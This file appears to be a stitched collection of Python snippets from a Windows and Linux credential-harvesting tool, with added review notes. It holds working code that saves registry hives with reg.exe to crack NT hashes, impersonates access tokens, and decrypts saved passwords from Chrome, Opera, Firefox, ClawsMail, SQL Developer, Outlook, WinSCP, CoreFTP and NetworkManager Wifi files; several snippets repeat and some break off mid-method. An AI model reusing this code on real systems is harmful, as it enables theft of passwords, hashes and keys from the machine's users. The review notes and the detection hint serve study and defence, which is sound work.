def hashes_to_dic(self, title, format, content):
    """Build the result list for a set of dumped account hashes.

    ``content`` maps a sortable key to a ``uid:rid:lmhash:nthash[:...]`` line.
    Every account name is appended to ``self.wordlist`` and every NT hash is
    handed to ``self.bruteForce_Hash``; accounts for which that call returns a
    truthy value are reported together with the recovered password.  The last
    element of the returned list always carries all raw hash lines under the
    ``'hashes'`` key.

    Review note: the return value mixes cleartext passwords with the raw
    hashes, so whatever consumes it is handling secrets.
    """
    Header().title1(title)
    print_debug('INFO', 'Format: (%s)' % format)

    cracked = []
    # The original output starts with an empty line, hence the leading entry.
    raw_lines = ['\r\n']
    for entry_key in sorted(content):
        line = content[entry_key]
        # Only the first four colon-separated fields are used; a line with
        # fewer fields raises ValueError on unpacking.
        uid, rid, lmhash, nthash = line.split(':')[:4]
        self.wordlist.append(uid.encode("utf8"))
        raw_lines.append(line)

        password = self.bruteForce_Hash(nthash)
        if password:
            cracked.append({
                'Category': 'System account',
                'user': uid,
                'password': password,
            })

    cracked.append({'hashes': '\r\n'.join(raw_lines)})
    return cracked
Exemple #2
	def run(self):
		"""Report stored credentials of the 'domain visible password' type.

		Walks the entries returned by ``self.get_creds()``, keeps those whose
		``Type`` equals ``CRED_TYPE_DOMAIN_VISIBLE_PASSWORD``, unprotects each
		blob with ``self.Win32CryptUnprotectData`` and passes the decoded
		results to ``print_output``.  Nothing is printed when ``get_creds()``
		returns a falsy value.
		"""
		Header().title_info('Dot Net Passport')

		stored = self.get_creds()
		if not stored:
			return

		pwdFound = []
		for cred in stored:
			if cred['Type'] != win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
				continue

			blob = cred['CredentialBlob']
			clear = self.Win32CryptUnprotectData(blob, self.get_entropy())
			# The helper signals failure with the literal string 'failed'.
			if clear == 'failed':
				continue

			values = {'TargetName': cred['TargetName']}
			if cred['UserName'] is not None:
				values['Username'] = cred['UserName']
			try:
				values['Password'] = clear.decode('utf16')
			except Exception as e:
				print_debug('DEBUG', '{0}'.format(e))
				values['INFO'] = 'Error decoding the password'
			pwdFound.append(values)

		print_output('Dot Net Passport', pwdFound)
Exemple #3
	def get_creds(self):
		"""Return the result of ``win32cred.CredEnumerate(None, 0)``.

		Any exception is logged at DEBUG level and turned into ``None``.
		"""
		try:
			return win32cred.CredEnumerate(None, 0)
		except Exception as e:
			print_debug('DEBUG', '{0}'.format(e))
		return None
def impersonate_token(hToken):
    """Duplicate ``hToken`` as a primary token and impersonate it.

    Returns the duplicated token handle, or ``None`` when
    ``ImpersonateLoggedOnUser`` fails.  ``hToken`` itself is closed here.

    Review notes (this is access-token manipulation, ATT&CK T1134):
    - The admin check only logs; execution continues when it fails.
    - ``WinError()`` builds an exception object that is never raised, so a
      failed ``DuplicateTokenEx`` is not reported to the caller.
    - The duplicated handle is not closed on the failure path at the end.
    - Errors from the three later privilege adjustments are discarded.
    """
    # Only logs: nothing stops the function when the caller is not an admin.
    if not windll.Shell32.IsUserAnAdmin():
        print_debug('ERROR', 'You need admin rights to run impersonate !')
    EnablePrivilege("SeDebugPrivilege")
    #hToken = getProcessToken(pid)
    hTokendupe = HANDLE( INVALID_HANDLE_VALUE )
    # Local copies of the Win32 enum values passed to DuplicateTokenEx.
    SecurityImpersonation = 2
    TokenPrimary = 1
    if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ):
        # NOTE(review): missing ``raise`` - the error object is discarded and
        # the code below runs with hTokendupe still at its initial value.
        WinError()
    # The source token is closed whether or not the duplication succeeded.
    windll.kernel32.CloseHandle(hToken)
    
    # Best-effort privilege adjustments; every failure is swallowed.
    try:
        EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeImpersonatePrivilege")
    except Exception as e:
        pass

    # NOTE(review): hTokendupe is left open when impersonation fails.
    if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe):
        return

    return hTokendupe
def start_proc_with_token(args, hTokendupe, hidden=True):
    """Start ``args`` as a new process running under the token ``hTokendupe``.

    Returns the new process id, or ``None`` when either
    ``CreateEnvironmentBlock`` or ``CreateProcessAsUserA`` fails.

    Review notes:
    - ``args`` is joined with single spaces and no quoting, so an argument
      containing a space is not passed through as one argument.
    - The environment block and the process/thread handles returned in
      ``PROCESS_INFORMATION`` are never released in this function.
    - Handle inheritance is enabled (the sixth argument is ``True``).
    """
    ##Start the process with the token.
    lpProcessInformation = PROCESS_INFORMATION()
    lpStartupInfo = STARTUPINFO()
    if hidden:
        # NOTE(review): CREATE_NEW_PROCESS_GROUP is a process-creation flag,
        # yet it is OR-ed into STARTUPINFO.dwFlags here - confirm intent.
        lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
        lpStartupInfo.wShowWindow = subprocess.SW_HIDE
    
    # Win32 creation-flag constants, defined locally.
    CREATE_NEW_CONSOLE = 0x00000010
    CREATE_UNICODE_ENVIRONMENT = 0x00000400
    NORMAL_PRIORITY_CLASS = 0x00000020
    
    dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE

    userenv = WinDLL('userenv', use_last_error=True)
    userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int)
    # argtypes are declared for DestroyEnvironmentBlock, but it is never called below.
    userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,)
    cenv = c_void_p()
    
    # Build the environment block for the token's user (third argument 0).
    success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0)
    if not success:
        return
    
    # ANSI variant of CreateProcessAsUser; the command line is a plain join of args.
    success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation))
    if not success:
       return
    
    print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId))
    return lpProcessInformation.dwProcessId
Exemple #6
	def run(self):
		"""Save registry hives with reg.exe, feed them to ``retrieve_hash``, then delete them.

		Returns early (after a warning) when the caller is not an administrator
		or when the saved hive files are missing after the save step.

		Review notes:
		- The ``<name>.save`` copies are written with a relative path, i.e. into
		  the current working directory, and hold sensitive hive data.
		- The final cleanup is not in a ``finally``: an exception raised by
		  ``retrieve_hash`` leaves the copies on disk.
		- reg.exe is started through a shell from a formatted string, and its
		  exit status is never inspected; success is inferred from the files.
		- For defenders: process-creation logging of ``reg.exe save`` against
		  HKLM hives covers this step.
		"""
		# Need admin privileges
		if not windll.Shell32.IsUserAnAdmin():
			# The title is printed only when INFO logging is enabled.
			if logging.getLogger().isEnabledFor(logging.INFO) == True:
				Header().title('Windows Secrets')
			print_debug('WARNING', '[!] This script should be run as admin!')
			return
		
		# print the title
		Header().title('Windows Secrets')
		
		# if hives already exists
		if self.check_existing_systemFiles():
			self.delete_existing_systemFiles() # delete it
		
		# save system hives (one reg.exe process per entry of self.sysFile;
		# reading stdout blocks until that process closes its output)
		for f in self.sysFile:
			subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
		
		# NOTE(review): this branch runs when the saved files are missing, so
		# the message about removing existing files looks misleading - confirm.
		if not self.check_existing_systemFiles():
			print_debug('WARNING', 'Remove existing hive files and launch it again.')
			return
		
		# The saved files are passed in the order sysFile[2], sysFile[1], sysFile[0].
		retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)
		
		# remove hives files
		self.delete_existing_systemFiles()
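def ListSids():
    """Return ``(pid, name, sid, username)`` tuples for the running processes.

    Processes with a pid of 4 or lower, processes without a user name, and
    processes that vanish during enumeration are skipped.  A failure while
    opening a process is logged and the process is skipped; a failure while
    resolving the SID is ignored silently.

    Review note: the return values of ``OpenProcess`` and
    ``OpenProcessToken`` are not checked, so ``GetTokenSid`` may be called
    with a handle that was never opened.
    """
    sids = []

    for proc in psutil.process_iter():
        try:
            pinfo = proc.as_dict(attrs=['pid', 'username', 'name'])
        except psutil.NoSuchProcess:
            # The process exited between enumeration and inspection.  Falling
            # through would reuse the previous iteration's pinfo (or raise
            # NameError on the first iteration), so skip it explicitly.
            continue
        if pinfo['pid'] <= 4:
            continue
        if pinfo['username'] is None:
            continue
        try:
            hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid']))
            hToken = HANDLE(INVALID_HANDLE_VALUE)
            windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken))

            try:
                sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username']))
            except Exception:
                # Best effort: a process whose SID cannot be read is left out.
                pass
            finally:
                # Release both handles whatever happened above.
                windll.kernel32.CloseHandle(hToken)
                windll.kernel32.CloseHandle(hProcess)
        except Exception as e:
            print_debug('ERROR', str(e))
    return sids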
Exemple #8
	def get_history(self):
		"""Return a list of URLs gathered from the registry and a helper DLL.

		Starts from ``self.history_from_regedit()``, adds every new entry
		beginning with "http" that the DLL's exported ``list`` function returns,
		then always appends four hard-coded login URLs.

		Review notes:
		- ``dll_name`` is defined outside this method; the library is loaded,
		  unloaded and then deleted from disk here.
		- The bare ``except`` hides every failure; when it triggers, the DLL is
		  neither unloaded nor removed.
		"""
		# This empty list is replaced immediately by the next assignment.
		urls = []
		urls = self.history_from_regedit()
		
		try:
			# wrapper to call the dll exported function (called list)
			lib = cdll.LoadLibrary(dll_name)
			lib.list.restype = POINTER(c_wchar_p)
			ret = lib.list()

			# A ctypes pointer has no length: the loop relies on a falsy entry
			# to terminate.
			for r in ret:
				if r:
					if r.startswith("http") and r not in urls:
						urls.append(r)
				else:
					break
		
			# Unload the dll to delete it later
			handle = lib._handle # obtain the DLL handle
			windll.kernel32.FreeLibrary(handle)
			
			# delete the dll
			os.remove(dll_name)
			
		except:
			print_debug('ERROR', 'Browser history failed to load, only few url will be tried')
			pass
		
		# Appended unconditionally, without a duplicate check.
		urls.append('https://www.facebook.com/')
		urls.append('https://www.gmail.com/')
		urls.append('https://accounts.google.com/')
		urls.append('https://accounts.google.com/servicelogin')
		
		return urls
Exemple #9
    def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
        """Return the decrypted account entries of a ClawsMail accountrc file.

        Every section of ``filename`` yields one dict with the keys
        ``'Account'``, ``'Address'`` and ``'Password'``; the password comes
        from ``self.pass_decrypt``.  Sections whose password cannot be read or
        decrypted are logged and left out.
        """
        parser = ConfigParser()
        parser.read(filename)

        pwdFound = []
        for section in parser.sections():
            try:
                try:
                    address = parser.get(section, 'address')
                    account = parser.get(section, 'account_name')
                except:
                    # A failure of either lookup resets both labels.
                    address = account = '<unknown>'

                password = self.pass_decrypt(parser.get(section, 'password'), key, mode=mode)
            except Exception as e:
                print_debug('ERROR', 'Error resolving password for account "%s": %s' % (section, e))
                continue

            pwdFound.append({'Account': account, 'Address': address, 'Password': password})

        return pwdFound
Exemple #10
	def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
		"""Decode the private-key entry held in ``self.key3`` and return the key bytes.

		Returns ``None`` when the fixed 16-byte entry id is absent from
		``self.key3``.

		Review notes:
		- All three parameters are overwritten by the first statement; only
		  ``masterPassword`` is actually read.
		- The recovered key is written to the DEBUG log in clear.
		- ``id`` is assigned but never used, and shadows the builtin.
		"""

		(globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword)
		
		if unhexlify('f8000000000000000000000000000001') not in self.key3:
			return None
		privKeyEntry = self.key3[ unhexlify('f8000000000000000000000000000001') ]
		# Bytes 1 and 2 give the salt and name lengths; the ASN.1 payload
		# starts after the 3-byte header plus those two fields.
		saltLen = ord( privKeyEntry[1] )
		nameLen = ord( privKeyEntry[2] )
		privKeyEntryASN1 = decoder.decode( privKeyEntry[3+saltLen+nameLen:] )
		data = privKeyEntry[3+saltLen+nameLen:]
		self.printASN1(data, len(data), 0)
		
		#see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
		entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
		privKeyData = privKeyEntryASN1[0][1].asOctets()
		privKey = self.decrypt3DES( globalSalt, masterPassword, entrySalt, privKeyData )
		self.printASN1(privKey, len(privKey), 0)

		# Two further ASN.1 layers are unwrapped before the key integer is reached.
		privKeyASN1 = decoder.decode( privKey )
		prKey= privKeyASN1[0][2].asOctets()
		self.printASN1(prKey, len(prKey), 0)
		prKeyASN1 = decoder.decode( prKey )
		id = prKeyASN1[0][1]
		key = long_to_bytes( prKeyASN1[0][3] )

		# NOTE(review): secret key material ends up in the debug output.
		print_debug('DEBUG', 'key: %s' % repr(key))
		return key
Exemple #11
	def hashes_to_dic(self, title, format, content):
		"""Turn dumped ``uid:rid:lmhash:nthash`` lines into the result list.

		``content`` is read in sorted key order.  Each account name goes into
		``self.wordlist``; each NT hash is tried with ``self.bruteForce_Hash``
		and, when that returns a truthy value, an account entry with the
		password is added.  The last list element holds every raw line under
		``'hashes'``.

		Review note: the result combines cleartext passwords and raw hashes.
		"""
		Header().title1(title)
		print_debug('INFO', 'Format: (%s)' % format)

		found = []
		# Leading entry reproduces the blank line at the start of the dump.
		dump_lines = ['\r\n']
		for name in sorted(content):
			record = content[name]
			# Fewer than four colon-separated fields raises ValueError here.
			uid, rid, lmhash, nthash = record.split(':')[:4]
			self.wordlist.append(uid.encode("utf8"))
			dump_lines.append(record)

			password = self.bruteForce_Hash(nthash)
			if not password:
				continue
			found.append({
				'Category': 'System account',
				'user': uid,
				'password': password,
			})

		found.append({'hashes': '\r\n'.join(dump_lines)})
		return found
Exemple #12
	def run(self):
		"""Locate the SQL Developer data and hand it to ``self.get_infos``.

		``get_mainPath()`` and ``get_passphrase()`` report problems through
		sentinel strings; each sentinel is logged and ends the run.
		"""
		Header().title_debug('SQL Developer')

		mainPath = self.get_mainPath()
		if mainPath == 'Error':
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
			return
		if mainPath == 'SQL_NOT_EXISTS':
			print_debug('INFO','SQL Developer not installed.')
			return
		if mainPath == 'SQL_NO_PASSWD':
			print_debug('INFO', 'No passwords found.')
			return

		passphrase = self.get_passphrase(mainPath)
		if passphrase == 'Not_Found':
			print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
			return
		if passphrase == 'xml_Not_Found':
			print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
			return

		salt = self.get_salt()
		self.get_infos(mainPath, passphrase, salt)
Exemple #13
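	def decipher_new_version(self, path):
		"""Read the ``logins`` table of the 'Login Data' database under ``path``.

		Each row's ``password_value`` is passed to
		``win32crypt.CryptUnprotectData``; rows that yield a non-empty result
		are reported through ``print_output``.  Returns ``None`` in every case,
		and does nothing when the database file does not exist.

		The SQLite connection is now closed on every path; the original left
		it open, including on the early return after a failed query.
		"""
		database_path = path + os.sep + 'Login Data'
		if not os.path.exists(database_path):
			return

		# Connect to the Database
		conn = sqlite3.connect(database_path)
		try:
			cursor = conn.cursor()

			# Get the results
			try:
				cursor.execute('SELECT action_url, username_value, password_value FROM logins')
			except Exception as e:
				print_debug('DEBUG', '{0}'.format(e))
				print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
				return

			pwdFound = []
			for result in cursor.fetchall():
				# Decrypt the Password
				password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
				if password:
					pwdFound.append({
						'Site': result[0],
						'Username': result[1],
						'Password': password,
					})
		finally:
			# Do not keep a handle on the browser's credential database.
			conn.close()

		# print the results
		print_output("Opera", pwdFound)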
Exemple #14
	def retrieve_password(self):
		"""Report the wireless settings stored by NetworkManager.

		Every regular file in ``/etc/NetworkManager/system-connections`` is
		parsed as an INI file; the options of each section whose name contains
		'wireless' are copied into one dict per file, next to the file name
		under ``'SSID'``.

		Review notes: a non-root caller only gets an INFO message and the scan
		goes on; since ``'SSID'`` is always set, every file produces an entry.
		"""
		Header().title_debug('Wifi (from Network Manager)')

		directory = '/etc/NetworkManager/system-connections'
		if not os.path.exists(directory):
			print_debug('ERROR', 'the path "%s" does not exist' %(directory))
			return

		if os.getuid() != 0:
			print_debug('INFO', 'You need more privileges (run it with sudo)\n')

		connection_files = [name for name in os.listdir(directory)
							if os.path.isfile(os.path.join(directory, name))]

		pwdFound = []
		for name in connection_files:
			parser = RawConfigParser()
			parser.read(os.path.join(directory, name))

			values = {'SSID': name}
			for section in parser.sections():
				if 'wireless' not in section:
					continue
				for option, value in parser.items(section):
					values[option] = value

			if values:
				pwdFound.append(values)

		print_output('Wifi', pwdFound)
Exemple #15
    def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
        """Collect the accounts stored in a ClawsMail accountrc file.

        One dict (``'Account'``, ``'Address'``, ``'Password'``) is produced per
        section, the password being the result of ``self.pass_decrypt``.  A
        section whose password cannot be read or decrypted is logged and
        skipped.
        """
        config = ConfigParser()
        config.read(filename)

        pwdFound = []
        for section_name in config.sections():
            try:
                try:
                    address = config.get(section_name, 'address')
                    account = config.get(section_name, 'account_name')
                except:
                    # Both labels fall back together, even if only one lookup failed.
                    address = '<unknown>'
                    account = '<unknown>'

                stored = config.get(section_name, 'password')
                password = self.pass_decrypt(stored, key, mode=mode)
            except Exception as e:
                print_debug('ERROR', 'Error resolving password for account "%s": %s' % (section_name, e))
            else:
                pwdFound.append({'Account': account, 'Address': address, 'Password': password})

        return pwdFound
Exemple #16
    def run(self):
        """Locate the SQL Developer data and pass it on to ``self.get_infos``.

        Both ``get_mainPath()`` and ``get_passphrase()`` signal problems with
        sentinel strings; each one is logged and stops the run.
        """
        Header().title_debug('SQL Developer')

        mainPath = self.get_mainPath()
        if mainPath == 'Error':
            print_debug('ERROR', 'The APPDATA environment variable is not defined.')
            return
        if mainPath == 'SQL_NOT_EXISTS':
            print_debug('INFO', 'SQL Developer not installed.')
            return
        if mainPath == 'SQL_NO_PASSWD':
            print_debug('INFO', 'No passwords found.')
            return

        passphrase = self.get_passphrase(mainPath)
        if passphrase == 'Not_Found':
            print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
            return
        if passphrase == 'xml_Not_Found':
            print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
            return

        self.get_infos(mainPath, passphrase, self.get_salt())
Exemple #17
    def get_history(self):
        """Collect URLs from the registry and from a helper DLL.

        The excerpt stops inside the ``try`` block: neither its handler nor
        the method's return statement is visible here.
        """
        # This empty list is replaced immediately by the next assignment.
        urls = []
        urls = self.history_from_regedit()

        try:
            # wrapper to call the dll exported function (called list)
            lib = cdll.LoadLibrary(dll_name)
            lib.list.restype = POINTER(c_wchar_p)
            ret = lib.list()

            # A ctypes pointer has no length: the loop relies on a falsy entry
            # to terminate.
            for r in ret:
                try:
                    if r:
                        if r.startswith("http") and r not in urls:
                            urls.append(r)
                    else:
                        break
                except Exception, e:
                    # An entry that cannot be processed is logged and skipped.
                    print_debug('DEBUG', '{0}'.format(e))

            # Unload the dll to delete it later
            handle = lib._handle  # obtain the DLL handle
            windll.kernel32.FreeLibrary(handle)

            # delete the dll (only reached when nothing above raised)
            os.remove(dll_name)
Exemple #18
    def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
        """Decode the private-key entry held in ``self.key3`` and return the key bytes.

        Returns ``None`` when the fixed 16-byte entry id is absent from
        ``self.key3``.

        Review notes:
        - All three parameters are overwritten by the first statement; only
          ``masterPassword`` is actually read.
        - The recovered key is written to the DEBUG log in clear.
        - ``id`` is assigned but never used, and shadows the builtin.
        """

        (globalSalt, masterPassword,
         entrySalt) = self.is_masterpassword_correct(masterPassword)

        if unhexlify('f8000000000000000000000000000001') not in self.key3:
            return None
        privKeyEntry = self.key3[unhexlify('f8000000000000000000000000000001')]
        # Bytes 1 and 2 give the salt and name lengths; the ASN.1 payload
        # starts after the 3-byte header plus those two fields.
        saltLen = ord(privKeyEntry[1])
        nameLen = ord(privKeyEntry[2])
        privKeyEntryASN1 = decoder.decode(privKeyEntry[3 + saltLen + nameLen:])
        data = privKeyEntry[3 + saltLen + nameLen:]
        self.printASN1(data, len(data), 0)

        #see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
        entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
        privKeyData = privKeyEntryASN1[0][1].asOctets()
        privKey = self.decrypt3DES(globalSalt, masterPassword, entrySalt,
                                   privKeyData)
        self.printASN1(privKey, len(privKey), 0)

        # Two further ASN.1 layers are unwrapped before the key integer is reached.
        privKeyASN1 = decoder.decode(privKey)
        prKey = privKeyASN1[0][2].asOctets()
        self.printASN1(prKey, len(prKey), 0)
        prKeyASN1 = decoder.decode(prKey)
        id = prKeyASN1[0][1]
        key = long_to_bytes(prKeyASN1[0][3])

        # NOTE(review): secret key material ends up in the debug output.
        print_debug('DEBUG', 'key: %s' % repr(key))
        return key
Exemple #19
	def get_key_info(self):
		"""Open the CoreFTP 'Sites' key under HKEY_CURRENT_USER for reading.

		Returns ``False`` when the key cannot be opened.  The excerpt ends
		after the handler, so what is done with ``key`` is not visible here.
		"""
		# Read-only access: query values and enumerate subkeys.
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
		except Exception,e:
			# Any failure to open the key is logged at DEBUG level only.
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #20
	def get_logins_info(self):
		"""Open the WinSCP 'Sessions' key under HKEY_CURRENT_USER for reading.

		Returns ``False`` when the key cannot be opened.  The excerpt ends
		after the handler, so what is done with ``key`` is not visible here.
		"""
		# Read-only access: query values and enumerate subkeys.
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			# NOTE(review): the path uses single backslashes in a non-raw
			# string; it only works because none of them forms an escape.
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
		except Exception,e:
			# Any failure to open the key is logged at DEBUG level only.
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #21
	def get_history(self):
		"""Collect URLs from the registry and from a helper DLL.

		The excerpt stops inside the ``try`` block: neither its handler nor
		the method's return statement is visible here.
		"""
		# This empty list is replaced immediately by the next assignment.
		urls = []
		urls = self.history_from_regedit()
		
		try:
			# wrapper to call the dll exported function (called list)
			lib = cdll.LoadLibrary(dll_name)
			lib.list.restype = POINTER(c_wchar_p)
			ret = lib.list()

			# A ctypes pointer has no length: the loop relies on a falsy entry
			# to terminate.
			for r in ret:
				try:
					if r:
						if r.startswith("http") and r not in urls:
							urls.append(r)
					else:
						break
				except Exception,e:
					# An entry that cannot be processed is logged and skipped.
					print_debug('DEBUG', '{0}'.format(e))
		
			# Unload the dll to delete it later
			handle = lib._handle # obtain the DLL handle
			windll.kernel32.FreeLibrary(handle)
			
			# delete the dll (only reached when nothing above raised)
			os.remove(dll_name)
Exemple #22
	def retrieve_password(self):
		"""Report the wireless settings stored by NetworkManager.

		Every regular file in ``/etc/NetworkManager/system-connections`` is
		parsed as an INI file; the options of each section whose name contains
		'wireless' are copied into one dict per file, next to the file name
		under ``'SSID'``.

		Review notes: a non-root caller only gets an INFO message and the scan
		goes on; since ``'SSID'`` is always set, every file produces an entry.
		"""
		Header().title_debug('Wifi (from Network Manager)')

		directory = '/etc/NetworkManager/system-connections'
		if not os.path.exists(directory):
			print_debug('WARNING', 'the path "%s" does not exist' %(directory))
			return

		if os.getuid() != 0:
			print_debug('INFO', 'You need more privileges (run it with sudo)\n')

		connection_files = [name for name in os.listdir(directory)
							if os.path.isfile(os.path.join(directory, name))]

		pwdFound = []
		for name in connection_files:
			parser = RawConfigParser()
			parser.read(os.path.join(directory, name))

			values = {'SSID': name}
			for section in parser.sections():
				if 'wireless' not in section:
					continue
				for option, value in parser.items(section):
					values[option] = value

			if values:
				pwdFound.append(values)

		print_output('Wifi', pwdFound)
Exemple #23
	def get_key_info(self):
		"""Open the CoreFTP 'Sites' key under HKEY_CURRENT_USER for reading.

		Returns ``False`` when the key cannot be opened.  The excerpt ends
		after the handler, so what is done with ``key`` is not visible here.
		"""
		# Read-only access: query values and enumerate subkeys.
		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		try:
			key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
		except Exception,e:
			# Any failure to open the key is logged at DEBUG level only.
			print_debug('DEBUG', '{0}'.format(e))
			return False
Exemple #24
	def run(self):
		"""Report the login stored in the Kalypso Media Launcher ini file.

		Reads ``launcher.ini`` below ``%APPDATA%``, base64-decodes the
		``password`` option of the ``styx user`` section and passes it to
		``self.xorstring`` with the fixed key defined below.

		Review note: the stored password is protected only by base64 plus a
		constant key embedded in this code; ``config.get`` raises when the
		section or an option is missing.
		"""
		Header().title_info('Kalypso Media Launcher')
		key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'

		if 'APPDATA' not in os.environ:
			print_debug('ERROR', 'The APPDATA environment variable is not defined.')
			return
		inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'

		# The actual user details are stored in *.userdata files
		if not os.path.exists(inifile):
			print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
			return

		config = ConfigParser.ConfigParser()
		config.read(inifile)

		login = config.get('styx user','login')
		cookedpw = base64.b64decode(config.get('styx user','password'))
		entry = {'Login': login, 'Password': self.xorstring(cookedpw, key)}

		print_output("Kalypso Media Launcher", [entry])
Exemple #25
class Chrome(ModuleInfo):
    """Module that opens Chrome's 'Login Data' database (excerpt).

    Only the database lookup, the copy to a temporary file and the SQLite
    connection are visible here; the rest of ``run`` is not part of the
    excerpt.
    """

    def __init__(self):
        """Register the module as 'chrome' in the 'browsers' category with the ``-c`` switch."""
        options = {
            'command': '-c',
            'action': 'store_true',
            'dest': 'chrome',
            'help': 'chrome'
        }
        ModuleInfo.__init__(self, 'chrome', 'browsers', options)

    # main function
    def run(self):
        """Locate the 'Login Data' file, copy it and connect to the copy.

        Review notes:
        - When the copy fails, only an error is logged and the code goes on to
          open the original database path.
        - The copy is written as ``tmp_db`` in the current working directory;
          its removal is not visible in this excerpt.
        """
        # print title
        Header().title_info('Chrome')

        database_path = ''
        if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
            # NOTE(review): the two variable names look swapped - 'Local
            # Settings\Application Data' is the Windows XP profile layout.
            path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'

            # ...and 'AppData\Local' is the layout of later Windows versions.
            path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'

            # Whichever path exists wins; the AppData\Local one is tried first.
            if os.path.exists(path_XP):
                database_path = path_XP

            elif os.path.exists(path_Win7):
                database_path = path_Win7

            else:
                print_debug('INFO', 'Google Chrome not installed.')
                return
        else:
            print_debug(
                'ERROR',
                'Environment variables (HOMEDRIVE or HOMEPATH) have not been found'
            )
            return

        # Copy database before to query it (bypass lock errors)
        try:
            shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
            database_path = os.getcwd() + os.sep + 'tmp_db'

        except Exception, e:
            # No return here: database_path still points at the original file.
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured copying the database file')

        # Connect to the Database
        try:
            conn = sqlite3.connect(database_path)
            cursor = conn.cursor()
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured opening the database file')
            return
Exemple #26
	def retrieve_password(self):
		"""Report Outlook profile entries that carry a password value.

		Walks two levels of subkeys below the Outlook profiles key in
		HKEY_CURRENT_USER.  For every value whose name contains 'password',
		``self.retrieve_info`` is called on the owning subkey and a non-empty
		result is collected.

		Review note: none of the opened registry handles is closed explicitly,
		and ``retrieve_info`` runs once per matching value, so a subkey with
		several such values is reported more than once.
		"""
		Header().title_debug('Outlook')

		accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
		keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

		try:
			hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
		except:
			print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
			return

		profile_count = win32api.RegQueryInfoKey(hkey)[0]
		pwdFound = []
		for profile_index in range(profile_count):
			name = win32api.RegEnumKey(hkey, profile_index)
			skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

			# A profile without subkeys simply yields an empty range.
			subkey_count = win32api.RegQueryInfoKey(skey)[0]
			for subkey_index in range(subkey_count):
				name_skey = win32api.RegEnumKey(skey, subkey_index)
				sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
				value_count = win32api.RegQueryInfoKey(sskey)[1]
				for value_index in range(value_count):
					value_name = win32api.RegEnumValue(sskey, value_index)[0]
					if 'password' not in value_name.lower():
						continue
					values = self.retrieve_info(sskey, name_skey)
